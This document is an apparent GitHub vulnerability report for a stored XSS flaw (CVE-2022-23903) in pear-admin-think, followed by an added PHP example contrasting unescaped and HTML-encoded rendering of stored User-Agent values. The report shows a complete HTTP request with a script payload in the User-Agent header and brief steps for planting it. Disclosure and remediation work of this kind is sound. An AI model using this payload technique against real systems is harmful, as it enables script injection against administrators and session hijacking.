CVE-2022-23903: A stored XSS vulnerability exists in pear-admin-think <=5.0.6 · Issue #1 · pearadmin/pear-admin-think
A Cross Site Scripting (XSS) vulnerability exists in pearadmin pear-admin-think <=5.0.6, which allows a login account to access arbitrary functions and cause stored XSS through a fake User-Agent.
[Suggested description]
A Cross Site Scripting (XSS) vulnerability exists in pear-admin-think <=5.0.6.
A logged-in account can access arbitrary functions and cause stored XSS through a fake User-Agent:
GET /admin.php/admin.photo/index HTTP/1.1
Host: pear.com
Upgrade-Insecure-Requests: 1
User-Agent: <script>alert('xss')</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://pear.com/admin.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ar;q=0.8,en;q=0.7
Cookie: PHPSESSID=23c79928dabeae8f8bf5f314b506af17; thinkphp_show_page_trace=0|0; token=JLlWdnblQBd0Ol7lKSe2w25Dj0jjoAQq31642737531.5216
Connection: close
[Vulnerability details]
First, prepare two test accounts with different levels.
Senior administrator admin
Click on any function, such as image management, intercept the request packet, modify the UA to an XSS payload, and forward it.
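
The report does not show where the User-Agent value is stored or rendered. The following is an added example, not code from pear-admin-think or from the report: it assumes the header is written to a log table and later listed on an admin page, and shows the unescaped rendering beside the HTML-encoded one. The function names and row layout are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers: the report does not show pear-admin-think's own logging code.

/** Normalize a User-Agent before storing it: drop control characters, bound the length. */
function normalize_user_agent(?string $ua, int $maxLen = 255): string
{
    $ua = $ua ?? '';
    // CR/LF and other ASCII control characters have no place in a stored UA string.
    $ua = preg_replace('/[\x00-\x1F\x7F]/', '', $ua) ?? '';
    // substr() may cut a multibyte character; ENT_SUBSTITUTE below covers that case.
    return substr($ua, 0, $maxLen);
}

/** Vulnerable pattern: the stored header is concatenated into HTML as-is. */
function render_log_row_unsafe(array $row): string
{
    return '<tr><td>' . $row['user'] . '</td><td>' . $row['user_agent'] . '</td></tr>';
}

/** Hardened pattern: every stored field is HTML-encoded at output time. */
function render_log_row_safe(array $row): string
{
    $e = static fn(string $v): string =>
        htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    return '<tr><td>' . $e($row['user']) . '</td><td>' . $e($row['user_agent']) . '</td></tr>';
}

// Constructed sample row, using the User-Agent value from the request on this page.
$row = [
    'user'       => 'lowpriv',
    'user_agent' => normalize_user_agent("<script>alert('xss')</script>"),
];

// Markup in the stored value is emitted unchanged into the admin page.
echo render_log_row_unsafe($row), PHP_EOL;

// The same value is emitted as entity-encoded text.
echo render_log_row_safe($row), PHP_EOL;
```

Normalizing on input only bounds what gets stored; the encoding at output time is what stops a stored header value from being interpreted as markup when a higher-privileged account views it.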